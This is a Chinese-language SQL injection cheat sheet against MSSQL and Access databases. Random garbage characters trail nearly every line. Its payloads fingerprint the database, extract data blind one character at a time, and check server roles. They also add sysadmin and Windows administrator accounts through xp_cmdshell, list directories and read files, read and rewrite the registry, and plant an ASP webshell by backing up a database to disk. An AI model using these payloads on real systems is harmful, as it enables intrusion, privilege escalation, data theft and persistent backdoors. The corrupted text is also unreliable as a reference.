1.判断是否有注入;and 1=1 ;and 1=2 /�b�g8oB4
2.初步判断是否是mssql ;and user>0 �3fp�����X
��9;.dNdg>
3.注入参数是字符'and [查询条件] and ''=' x�<�imMJ��
�� d+=�;sJ
4.搜索时没过滤参数的'and [查询条件] and '%25'=' y!��[�h��
NmK%�k jCx
5.判断数据库系统 x'}{^'�}�/
m`�n51�i{U
;and (select count(*) from sysobjects)>0 mssql 0�\u_��\%[
WpRi+NC}ln
;and (select count(*) from msysobjects)>0 access CK�j3-rcF(
�A*W ��QdY
IhU���u�L0
UGl}=hwKkG
6.猜数据库 ;and (select Count(*) from [数据库名])>0 E|�#'u^`yv
'�t�F<�7\!
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 !! #�\P7�P
8iq�~ha$]|
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 jt?R
a�1Z�
nLYy��S�#�
9.(1)猜字段的ascii值(access) =n%?�o�Lg^
�^fH]R�lx�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ]kc]YO7i%R
�{�d=y9Jb^
(2)猜字段的ascii值(mssql) V5�R``T�p�
_M{m��6k(h
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 R(�ay&f%�E
��obUh+9K
10.测试权限结构(mssql) ?���zxKk(J
k5W5 9��tz
uPb�9j�;Q?
N/]TZu~k z
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ��
RtK/bUa
VM�|8HR7�U
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- >[ywrB ?�T
P�L��w�a!j
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ?DM�-C5��$
f�FM�G9�]*
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �<[b\V+M��
350�y6�pVh
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 0s=�G�M|y�
w��Mei`svY
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �.3oF�Sc`q
LTG/gif[u�
;and 1=(select IS_MEMBER('db_owner'));-- H~&9xtuH�N
BYP,}�yzA�
tlG&�PVvr�
;v��#~��o*
11.添加mssql和系统的帐户 RQ�v`�D&u_
�Onby=Y
o6
;exec master.dbo.sp_addlogin username;-- P6;L\9=�H<
;exec master.dbo.sp_password null,username,password;-- luAhyEp��
{P(IA2J'S�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- z�aR�~�f�O
BwrMR�Mq"�
;exec master.dbo.xp_cmdshell 'net user username password [K�%J��t��
[J��sQ/|=z
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- kV�Z>�Dc2M
uflp4_D �
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 2=���u5N[*
v-�4e�N1OS
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- t��~�gnai
�ZJ� ��u�\
�O3B�\K <l
'^}l|��(��
12.(1)遍历目录 �$�:F]�O$A
*m�2J$9��q
;create table dirs(paths varchar(100), id int) F71.%p7C8"
Bg�lh}_��X
;insert dirs exec master.dbo.xp_dirtree 'c:\' yt�r~}� M%
�<�d�h7*�M
;and (select top 1 paths from dirs)>0 �!)KX?i[�Q
2A
�{k>TjQ
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Z6
�(;~"Em
c�D]{ �Nn
L�@9��"6�&
"��?n~ /9`
(2)遍历目录 hZ5h(CQ?"#
o=4d��2V%m
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- +�*~��?JT
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 i$����"B��
�3x.|g���
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 V���1;n5YL
a{�,EX�[~b
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 Ei��vZI<<a
��jja9:$#�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �=)�(�sN"%
L0_R�2E�A
4:���5�CnK
315Rk!�{AJ
13.mssql中的存储过程 !2$O^
}6�"
\}� P}��H
xp_regenumvalues 注册表根键, 子键 �OT\�[qa�K
r4D6g>)h1q
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 l^WFMeMD3a
&-s!k�o4z
xp_regread 根键,子键,键值名 [uW{Ap��~2
qP�*$�wKY,
;exec xp_regread :1s6h%evrT
'72Z�Ldi}-
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 i�{�
eD�V
d�GTAZ(1W
xp_regwrite 根键,子键, 值名, 值类型, 值 KKl�8tI\u~
0:Ak�4L6�k
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �f��L�x�FF
�a�Z@Ke$jD
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ��Z,_yE*�q
I�(��
G8cK
xp_regdeletevalue 根键,子键,值名 �\{�P(�s�:
X#Ajt/XQ��
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 V<?�t(��_Y
SP��97�Q�-
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ��;HgV(d#X
/@��Y/(+DE
O. �� V!L
wYOSaGyZ0I
14.mssql的backup创建webshell v.c2�(w/�P
}�|�(�K�I�
use model �0r.*7aXu
DU|0#z=*t5
create table cmd(str image); �`��` 6?;Y
C$b$)�uI;�
insert into cmd(str) values (''); ��B}C�"X�c
V��D�<�W�
backup database model to disk='c:\l.asp'; 0�".pw; .}
-_4U+Cfmtl
MX ���xRM~
RiIJ#:6+^I
15.mssql内置函数 �Ck/4�h��Z
k#w[G�L�|T
;and (select @@version)>0 获得Windows的版本号 �3;�>|*(cO
Kisd.~u8�j
;and user_name()='dbo' 判断当前系统的连接用户是不是sa I.euu�zBgA
Wu,�'S;>C
;and (select user_name())>0 爆当前系统的连接用户 d/j$_NQ�&!
qR-��-lv�O
;and (select db_name())>0 得到当前连接的数据库 K��#}DX�q�
�BO�oLs(p�
&w- QMj�M>
�]o6Or,�ml
16.简洁的webshell !�����dv�
H"N
o{|�^<
use model 9ax�J2J'�g
�4�S��f��v
create table cmd(str image); +3(1QgYM%�
[�kDjht|$>
insert into cmd(str) values (''); W�t"fn�&R}
2a3�h�m8%U
backup database model to disk='g:\wwwtest\l.asp';
